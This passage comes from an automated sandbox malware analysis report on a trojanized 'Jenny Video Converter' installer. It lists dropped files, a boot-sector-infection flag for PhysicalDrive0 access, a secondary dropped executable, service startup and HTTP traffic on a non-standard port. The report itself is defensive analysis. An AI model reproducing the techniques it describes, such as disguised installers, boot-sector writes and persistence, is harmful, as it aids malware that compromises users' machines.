        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004502AC GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_004502AC
        Source: jennyvideoconverter32_64.exe.2.drStatic PE information: section name: _cde_2
        Source: is-R14KT.tmp.2.drStatic PE information: section name: /4
        Source: is-GR40U.tmp.2.drStatic PE information: section name: /4
        Source: is-IR87B.tmp.2.drStatic PE information: section name: /4
        Source: is-R59QM.tmp.2.drStatic PE information: section name: /4
        Source: is-G1ORK.tmp.2.drStatic PE information: section name: /4
        Source: is-SBF1H.tmp.2.drStatic PE information: section name: /4
        Source: is-DDT59.tmp.2.drStatic PE information: section name: /4
        Source: is-E27ND.tmp.2.drStatic PE information: section name: /4
        Source: is-0NOE7.tmp.2.drStatic PE information: section name: /4
        Source: is-7MVDI.tmp.2.drStatic PE information: section name: /4
        Source: is-3L92A.tmp.2.drStatic PE information: section name: /4
        Source: is-8J8L1.tmp.2.drStatic PE information: section name: /4
        Source: is-O680T.tmp.2.drStatic PE information: section name: /4
        Source: is-CCK3H.tmp.2.drStatic PE information: section name: /4
        Source: is-FABCG.tmp.2.drStatic PE information: section name: /4
        Source: is-S9SIF.tmp.2.drStatic PE information: section name: /4
        Source: is-KK58F.tmp.2.drStatic PE information: section name: /4
        Source: is-I6MFQ.tmp.2.drStatic PE information: section name: /4
        Source: is-D0HIN.tmp.2.drStatic PE information: section name: /4
        Source: is-SPPOJ.tmp.2.drStatic PE information: section name: /4
        Source: is-8FEA4.tmp.2.drStatic PE information: section name: /4
        Source: is-MCN70.tmp.2.drStatic PE information: section name: /4
        Source: is-P1MHN.tmp.2.drStatic PE information: section name: /4
        Source: is-8PPAH.tmp.2.drStatic PE information: section name: /4
        Source: is-19DMT.tmp.2.drStatic PE information: section name: /4
        Source: is-73S5T.tmp.2.drStatic PE information: section name: /4
        Source: is-AUN77.tmp.2.drStatic PE information: section name: /4
        Source: ET Ammeter Side 10.7.45.exe.3.drStatic PE information: section name: _cde_2
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exeCode function: 0_2_004065B8 push 004065F5h; ret 0_2_004065ED
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exeCode function: 0_2_004040B5 push eax; ret 0_2_004040F1
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exeCode function: 0_2_00408104 push ecx; mov dword ptr [esp], eax0_2_00408109
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exeCode function: 0_2_00404185 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exeCode function: 0_2_00404206 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exeCode function: 0_2_0040C218 push eax; ret 0_2_0040C219
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exeCode function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exeCode function: 0_2_00404283 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exeCode function: 0_2_00408F38 push 00408F6Bh; ret 0_2_00408F63
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_00409954 push 00409991h; ret 2_2_00409989
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_0040A04F push ds; ret 2_2_0040A050
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_0040A023 push ds; ret 2_2_0040A04D
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_00460088 push ecx; mov dword ptr [esp], ecx2_2_0046008C
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004062CC push ecx; mov dword ptr [esp], eax2_2_004062CD
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_0049467C push ecx; mov dword ptr [esp], ecx2_2_00494681
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004106E0 push ecx; mov dword ptr [esp], edx2_2_004106E5
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_00412938 push 0041299Bh; ret 2_2_00412993
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_0040D038 push ecx; mov dword ptr [esp], edx2_2_0040D03A
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004850AC push ecx; mov dword ptr [esp], ecx2_2_004850B1
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_00443450 push ecx; mov dword ptr [esp], ecx2_2_00443454
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_0040546D push eax; ret 2_2_004054A9
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_0040553D push 00405749h; ret 2_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_0040F598 push ecx; mov dword ptr [esp], edx2_2_0040F59A
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004055BE push 00405749h; ret 2_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_00459634 push 00459678h; ret 2_2_00459670
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_0040563B push 00405749h; ret 2_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004056A0 push 00405749h; ret 2_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004517E4 push 00451817h; ret 2_2_0045180F
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004519A8 push ecx; mov dword ptr [esp], eax2_2_004519AD
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_00483A08 push 00483AF7h; ret 2_2_00483AEF
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_00477A24 push ecx; mov dword ptr [esp], edx2_2_00477A25

        Persistence and Installation Behavior

        barindex
        Contains functionality to infect the boot sector
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive03_2_00401A4F
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive03_2_02D8F7D6
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-GR40U.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Temp\is-SQ448.tmp\_isetup\_shfoldr.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Temp\is-SQ448.tmp\_isetup\_RegDLL.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libpangomm-1.4-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libpangowin32-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-KK58F.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-SBF1H.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libharfbuzz-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libgdkmm-2.4-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-3L92A.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libsigc-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-D0HIN.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-0NOE7.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-FABCG.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-8PPAH.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\liblcms2-2.dll (copy)Jump to dropped file
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exeFile created: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libpng16-16.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libglibmm-2.4-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libwinpthread-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-R14KT.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-I6MFQ.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeFile created: C:\ProgramData\ET Ammeter Side 10.7.45\ET Ammeter Side 10.7.45.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libpcre-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-P1MHN.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-MCN70.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-G1ORK.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Temp\is-SQ448.tmp\_isetup\_setup64.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libpango-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libgomp-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libpangoft2-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-CCK3H.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\librsvg-2-2.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libgdk_pixbuf-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-DDT59.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\uninstall\unins000.exe (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-R59QM.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\zlib1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libgcc_s_dw2-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-IR87B.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-7MVDI.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libpangocairo-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libgdk-win32-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-S9SIF.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libgobject-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-SPPOJ.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libtiff-5.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libjpeg-8.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libgmodule-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\liblzma-5.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-73S5T.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libpixman-1-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-O680T.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-E27ND.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libintl-8.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-8J8L1.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Temp\is-SQ448.tmp\_isetup\_iscrypt.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\libgraphite2.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\uninstall\is-SAKD7.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-AUN77.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-19DMT.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpFile created: C:\Users\user\AppData\Local\Jenny Video Converter\is-8FEA4.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeFile created: C:\ProgramData\ET Ammeter Side 10.7.45\ET Ammeter Side 10.7.45.exeJump to dropped file

        Boot Survival

        barindex
        Contains functionality to infect the boot sector
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive03_2_00401A4F
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive03_2_02D8F7D6
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: 3_2_004027BE StartServiceCtrlDispatcherA,3_2_004027BE

        Hooking and other Techniques for Hiding and Protection

        barindex
        Uses known network protocols on non-standard ports
        Source: unknownNetwork traffic detected: HTTP traffic on port 2023 -> 63196
        Source: unknownNetwork traffic detected: HTTP traffic on port 63196 -> 2023
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,2_2_00423C1C
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,2_2_00423C1C
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004241EC IsIconic,SetActiveWindow,SetFocus,2_2_004241EC
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004241A4 IsIconic,SetActiveWindow,2_2_004241A4
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_00418394 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,2_2_00418394
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_0042286C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,2_2_0042286C
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004833BC IsIconic,GetWindowLongA,ShowWindow,ShowWindow,2_2_004833BC
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004175A8 IsIconic,GetCapture,2_2_004175A8
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_00417CDE IsIconic,SetWindowPos,2_2_00417CDE
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_00417CE0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,2_2_00417CE0
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_0041F128 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,2_2_0041F128
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,3_2_00401B4B
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,3_2_02D8F8DA
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeWindow / User API: threadDelayed 9727Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-GR40U.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SQ448.tmp\_isetup\_shfoldr.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SQ448.tmp\_isetup\_RegDLL.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libpangomm-1.4-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libpangowin32-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-KK58F.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-SBF1H.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libharfbuzz-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libgdkmm-2.4-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-3L92A.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libsigc-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-D0HIN.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-0NOE7.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-FABCG.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\liblcms2-2.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-8PPAH.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libpng16-16.dll (copy)Jump to dropped file
